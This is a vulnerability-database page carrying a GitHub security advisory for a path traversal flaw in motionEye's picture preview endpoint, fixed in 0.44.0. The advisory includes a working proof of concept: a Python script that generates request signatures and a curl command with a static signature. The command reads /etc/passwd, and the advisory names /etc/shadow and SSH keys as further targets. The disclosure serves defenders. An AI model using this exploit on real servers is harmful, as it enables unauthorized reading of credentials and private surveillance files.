Find a vulnerability

Search criteria

Vendor

Product

Assigner

Sources

Sort by

Order

Apply ordering (override relevance)

Related vulnerabilities

GHSA-G9FX-5R4H-PCW3

Vulnerability from github – Published: 2026-06-22 17:10 – Updated: 2026-06-22 17:10

Summary

motionEye has an Arbitrary File Read via Path Traversal in Picture/Movie Preview Endpoint

Details

Summary

motionEye v0.43.1 (latest stable) is vulnerable to path traversal in the picture and movie API endpoints, like /picture/{id}/preview/{filename}. Neither the API handlers, nor the mediafiles.py functions like get_media_preview() check for .. sequences in the filename parameter, except get_media_content() which does. This allows an authenticated user with normal (non-admin) privileges to read arbitrary files from the filesystem as the motionEye process user.

Details

The get_media_content() function properly validates the path:

# mediafiles.py ~line 506 — SAFE
def get_media_content(camera_config, path, media_type):
    target_dir = camera_config['target_dir']
    full_path = os.path.join(target_dir, path)

    if '..' in path:        # <-- PATH TRAVERSAL CHECK PRESENT
        return None
    ...

But get_media_preview() does NOT:

# mediafiles.py ~line 910 — VULNERABLE
def get_media_preview(camera_config, path, media_type, ...):
    target_dir = camera_config['target_dir']
    full_path = os.path.join(target_dir, path)
    # <-- NO '..' CHECK
    ...

Similarly, del_media_content() at line ~865 is also missing the check. This is a classic inconsistent fix pattern.

The exploit requires %2F-encoded slashes (..%2F..%2F) which Tornado's URL router does NOT normalize — it passes the raw ../ through to os.path.join().

PoC

Step 1: Authenticate as any user (normal or admin).

Step 2: Compute the request signature. motionEye uses HMAC-style signatures for API authentication. The signature is SHA1("GET:<path>?_username=<user>::<password>"). With the default empty admin password:

#!/usr/bin/env python3
"""Signature generator for motionEye path traversal PoC"""
import hashlib, re, urllib.parse

_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]\":, -]', re.DOTALL)

def compute_signature(method, path, key=''):
    parts = list(urllib.parse.urlsplit(path))
    query = [q for q in urllib.parse.parse_qsl(parts[3], keep_blank_values=True) if q[0] != '_signature']
    query.sort(key=lambda q: q[0])
    query = [(n, urllib.parse.quote(v, safe="!'()*~")) for (n, v) in query]
    query = '&'.join([(q[0] + '=' + q[1]) for q in query])
    parts[0] = parts[1] = ''
    parts[3] = query
    path = urllib.parse.urlunsplit(parts)
    path = _SIGNATURE_REGEX.sub('-', path)
    key = _SIGNATURE_REGEX.sub('-', key)
    return hashlib.sha1(('{}:{}:{}:{}'.format(method, path, '', key)).encode('utf-8')).hexdigest().lower()

path = '/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin'
sig = compute_signature('GET', path)
print(f'Signature: {sig}')
print(f'curl --path-as-is -s "http://TARGET:8765/{path}&_signature={sig}"')

Step 3: Send the request using curl --path-as-is (the --path-as-is flag is required — without it, curl normalizes ..%2F and collapses the traversal before sending):

# With default empty admin password, the signature is static:
curl --path-as-is -s "http://localhost:8766/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin&_signature=8b387100a519c617bdd66fe629d14b05e09c6e0c"

Step 4: The server returns the contents of /etc/passwd.

Verified output:

etc_passwd

Note on the signature value: The signature 8b387100a519c617bdd66fe629d14b05e09c6e0c is valid for the default empty admin password. If the admin password has been changed, regenerate the signature using the Python script above with the correct password passed as the key parameter.

Impact

An authenticated user (normal or admin) can read arbitrary files from the server, including:

/etc/passwd — user enumeration
/etc/motioneye/motion.conf — admin password hash, surveillance password in plaintext
/etc/shadow — password hashes (if running as root, which is default in Docker)
SSH keys, environment variables, and other sensitive configuration files
Surveillance footage from other cameras

Severity

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "motioneye"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.44.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-31978"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-284"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-22T17:10:38Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nmotionEye v0.43.1 (latest stable) is vulnerable to path traversal in the picture and movie API endpoints, like `/picture/{id}/preview/{filename}`. Neither the API handlers, nor the `mediafiles.py` functions like `get_media_preview()` check for `..` sequences in the filename parameter, except `get_media_content()` which does. This allows an authenticated user with normal (non-admin) privileges to read arbitrary files from the filesystem as the motionEye process user.\n\n### Details\n\nThe `get_media_content()` function properly validates the path:\n\n```python\n# mediafiles.py ~line 506 \u2014 SAFE\ndef get_media_content(camera_config, path, media_type):\n    target_dir = camera_config[\u0027target_dir\u0027]\n    full_path = os.path.join(target_dir, path)\n\n    if \u0027..\u0027 in path:        # \u003c-- PATH TRAVERSAL CHECK PRESENT\n        return None\n    ...\n```\n\nBut `get_media_preview()` does NOT:\n\n```python\n# mediafiles.py ~line 910 \u2014 VULNERABLE\ndef get_media_preview(camera_config, path, media_type, ...):\n    target_dir = camera_config[\u0027target_dir\u0027]\n    full_path = os.path.join(target_dir, path)\n    # \u003c-- NO \u0027..\u0027 CHECK\n    ...\n```\n\nSimilarly, `del_media_content()` at line ~865 is also missing the check. This is a classic inconsistent fix pattern.\n\nThe exploit requires `%2F`-encoded slashes (`..%2F..%2F`) which Tornado\u0027s URL router does NOT normalize \u2014 it passes the raw `../` through to `os.path.join()`.\n\n### PoC\n\n**Step 1:** Authenticate as any user (normal or admin).\n\n**Step 2:** Compute the request signature. motionEye uses HMAC-style signatures for API authentication. The signature is `SHA1(\"GET:\u003cpath\u003e?_username=\u003cuser\u003e::\u003cpassword\u003e\")`. With the default empty admin password:\n\n```python\n#!/usr/bin/env python3\n\"\"\"Signature generator for motionEye path traversal PoC\"\"\"\nimport hashlib, re, urllib.parse\n\n_SIGNATURE_REGEX = re.compile(r\u0027[^A-Za-z0-9/?_.=\u0026{}\\[\\]\\\":, -]\u0027, re.DOTALL)\n\ndef compute_signature(method, path, key=\u0027\u0027):\n    parts = list(urllib.parse.urlsplit(path))\n    query = [q for q in urllib.parse.parse_qsl(parts[3], keep_blank_values=True) if q[0] != \u0027_signature\u0027]\n    query.sort(key=lambda q: q[0])\n    query = [(n, urllib.parse.quote(v, safe=\"!\u0027()*~\")) for (n, v) in query]\n    query = \u0027\u0026\u0027.join([(q[0] + \u0027=\u0027 + q[1]) for q in query])\n    parts[0] = parts[1] = \u0027\u0027\n    parts[3] = query\n    path = urllib.parse.urlunsplit(parts)\n    path = _SIGNATURE_REGEX.sub(\u0027-\u0027, path)\n    key = _SIGNATURE_REGEX.sub(\u0027-\u0027, key)\n    return hashlib.sha1((\u0027{}:{}:{}:{}\u0027.format(method, path, \u0027\u0027, key)).encode(\u0027utf-8\u0027)).hexdigest().lower()\n\npath = \u0027/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin\u0027\nsig = compute_signature(\u0027GET\u0027, path)\nprint(f\u0027Signature: {sig}\u0027)\nprint(f\u0027curl --path-as-is -s \"http://TARGET:8765/{path}\u0026_signature={sig}\"\u0027)\n```\n\n**Step 3:** Send the request using `curl --path-as-is` (the `--path-as-is` flag is **required** \u2014 without it, curl normalizes `..%2F` and collapses the traversal before sending):\n\n```bash\n# With default empty admin password, the signature is static:\ncurl --path-as-is -s \"http://localhost:8766/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin\u0026_signature=8b387100a519c617bdd66fe629d14b05e09c6e0c\"\n```\n\n**Step 4:** The server returns the contents of `/etc/passwd`.\n\n**Verified output:**\n\n\u003cimg width=\"1743\" height=\"410\" alt=\"etc_passwd\" src=\"https://github.com/user-attachments/assets/30ec85f7-4fe7-4d3b-ae23-1d02c3ecad64\" /\u003e\n\n\u003e **Note on the signature value:** The signature `8b387100a519c617bdd66fe629d14b05e09c6e0c` is valid for the default empty admin password. If the admin password has been changed, regenerate the signature using the Python script above with the correct password passed as the `key` parameter.\n\n### Impact\n\nAn authenticated user (normal or admin) can read arbitrary files from the server, including:\n\n- `/etc/passwd` \u2014 user enumeration\n- `/etc/motioneye/motion.conf` \u2014 admin password hash, surveillance password in plaintext\n- `/etc/shadow` \u2014 password hashes (if running as root, which is default in Docker)\n- SSH keys, environment variables, and other sensitive configuration files\n- Surveillance footage from other cameras",
  "id": "GHSA-g9fx-5r4h-pcw3",
  "modified": "2026-06-22T17:10:38Z",
  "published": "2026-06-22T17:10:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/motioneye-project/motioneye/security/advisories/GHSA-g9fx-5r4h-pcw3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/motioneye-project/motioneye"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "motionEye has an Arbitrary File Read via Path Traversal in Picture/Movie Preview Endpoint"
}